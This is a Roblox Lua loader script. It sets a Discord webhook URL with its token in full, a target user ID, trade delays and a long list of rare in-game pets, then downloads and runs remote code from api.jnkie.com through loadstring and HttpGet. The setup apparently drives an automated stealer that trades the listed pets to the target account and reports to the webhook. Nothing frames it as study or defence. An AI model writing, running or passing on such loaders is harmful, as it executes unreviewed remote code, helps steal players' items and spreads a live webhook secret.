getgenv().WEBHOOK_URL = "https://discord.com/api/webhooks/1484672765196898375/8-mZol4t3mLrf0J8OQRZnop3HW29UStHc_0hj3YMzUeSFOWMmjZp0OUMSETMmHGZVyLZ"
getgenv().TARGET_USER_ID = 7542471568
getgenv().DELAY_STEP = 0.5
getgenv().TRADE_CYCLE_DELAY = 1
getgenv().TARGET_PETS = {
    "Headless Horseman",
    "Strawberry Elephant",
    "Meowl",
    "Skibidi Toilet",
    "1x1x1x1",
    "25",
    "67",
    "Agarrini la Palini",
    "Antonio",
    "Arcadopus",
    "Bacuru and Egguru",
    "Bisonte Giuppitere",
    "Blackhole Goat",
    "Boatito Auratito",
    "Brunito Marsito",
    "Bunito Bunito Spinito",
    "Bunnyman",
    "Burguro And Fryuro",
    "Burrito Bandito",
    "Capitano Moby",
    "Celestial Pegasus",
    "Celularcini Viciosini",
    "Cerberus",
    "Chachechi",
    "Chicleteira Bicicleteira",
    "Chicleteira Cupideira",
    "Chicleteira Noelteira",
    "Chicleteirina Bicicleteirina",
    "Chicliterita bicicliterita",
    "Chill Puppy",
    "Chillin Chili",
    "Chimnino",
    "Chipso and Queso",
    "Cloverat Clapat",
    "Clovkur Kurkur",
    "Coffin Tung Tung Tung Sahur",
    "Cooki and Milki",
    "Cuadramat and Pakrahmatmamat",
    "Cupid Cupid Sahur",
    "Cupid Hotspot",
    "Donkeyturbo Express",
    "Dragon Cannelloni",
    "Dragon Gingerini",
    "Dug dug dug",
    "Dul Dul Dul",
    "Eid Eid Eid Sahur",
    "Esok Sekolah",
    "Eviledon",
    "Extinct Matteo",
    "Extinct Tralalero",
    "Festive 67",
    "Fishino Clownino",
    "Fortunu and Cashuru",
    "Foxini Lanternini",
    "Fragola La La La",
    "Fragrama and Chocrama",
    "Frankentteo",
    "GOAT",
    "Garama and Madundung",
    "Giftini Spyderini",
    "Ginger Gerat",
    "Gobblino Uniciclino",
    "Gold Gold Gold",
    "Graipuss Medussi",
    "Granny",
    "Griffin",
    "Guerriro Digitale",
    "Guest 666",
    "Ho Ho Ho Sahur",
    "Horegini Boom",
    "Hydra Dragon Cannelloni",
    "Jackorilla",
    "Job Job Job Sahur",
    "Jolly Jolly Sahur",
    "Karker Sahur",
    "Karkerkar Kurkur",
    "Ketchuru and Musturu",
    "Ketupat Bros",
    "Ketupat Kepat",
    "La Casa Boo",
    "La Cucaracha",
    "La Extinct Grande",
    "La Food Combinasion",
    "La Ginger Sekolah",
    "La Grande Combinasion",
    "La Jolly Grande",
    "La Karkerkar Combinasion",
    "La Lucky Grande",
    "La Romantic Grande",
    "La Sahur Combinasion",
    "La Secret Combinasion",
    "La Spooky Grande",
    "La Supreme Combinasion",
    "La Taco Combinasion",
    "La Vacca Jacko Linterino",
    "La Vacca Lepre Lepreino",
    "La Vacca Prese Presente",
    "La Vacca Saturno Saturnita",
    "Las Sis",
    "Las Tralaleritas",
    "Las Vaquitas Saturnitas",
    "Lavadorito Spinito",
    "List List List Sahur",
    "Los 25",
    "Los 67",
    "Los Amigos",
    "Los Bros",
    "Los Burritos",
    "Los Candies",
    "Los Chicleteiras",
    "Los Combinasionas",
    "Los Cucarachas",
    "Los Cupids",
    "Los Hotspotsitos",
    "Los Jobcitos",
    "Los Jolly Combinasionas",
    "Los Karkeritos",
    "Los Matteos",
    "Los Mi Gatitos",
    "Los Mobilis",
    "Los Nooo My Hotspotsitos",
    "Los Planitos",
    "Los Primos",
    "Los Puggies",
    "Los Quesadillas",
    "Los Sekolahs",
    "Los Spaghettis",
    "Los Spooky Combinasionas",
    "Los Spyderinis",
    "Los Sweethearts",
    "Los Tacoritas",
    "Los Tortus",
    "Los Tralaleritos",
    "Los Trios",
    "Love Love Bear",
    "Love Love Love Sahur",
    "Lovin Rose",
    "Luck Luck Luck Sahur",
    "Mariachi Corazoni",
    "Mi Gatito",
    "Mieteteira Bicicleteira",
    "Money Money Puggy",
    "Money Money Reindeer",
    "Nacho Spyder",
    "Naughty Naughty",
    "Noo my Candy",
    "Noo my Gold",
    "Noo my Heart",
    "Noo my Present",
    "Noo my examine",
    "Nooo My Hotspot",
    "Nuclearo Dinossauro",
    "Orcaledon",
    "Patteo",
    "Perrito Burrito",
    "Pirulitoita Bicicleteira",
    "Please my Present",
    "Popcuru and Fizzuru",
    "Pot Hotspot",
    "Pot Pumpkin",
    "Pumpkini Spyderini",
    "Quesadilla Crocodila",
    "Quesadillo Vampiro",
    "Rang Ring Bus",
    "Reindeer Tralala",
    "Reinito Sleighito",
    "Rocco Disco",
    "Rosetti Tualetti",
    "Rosey and Teddy",
    "Sammyni Fattini",
    "Sammyni Spyderini",
    "Santa Hotspot",
    "Santteo",
    "Snailo Clovero",
    "Spaghetti Tualetti",
    "Spinny Hammy",
    "Spooky and Pumpky",
    "Swag Soda",
    "Swaggy Bros",
    "Tacorita Bicicleta",
    "Tang Tang Keletang",
    "Telemorte",
    "Tictac Sahur",
    "To to to Sahur",
    "Torrtuginni Dragonfrutini",
    "Tralaledon",
    "Trenostruzzo Turbo 4000",
    "Trickolino",
    "Triplito Tralaleritos",
    "Tuff Toucan",
    "Tung Tung Tung Sahur",
    "Ventoliero Pavonero",
    "Vulturino Skeletono",
    "W or L",
    "Yess my examine",
    "Zombie Tralala",
}

getgenv().SCRIPT_KEY = "KEYLESS"
loadstring(game:HttpGet("https://api.jnkie.com/api/v1/luascripts/public/c4135eae72117420d637eab75e04aa36643d1a5c496b240b9fda5e499f038f5e/download"))()
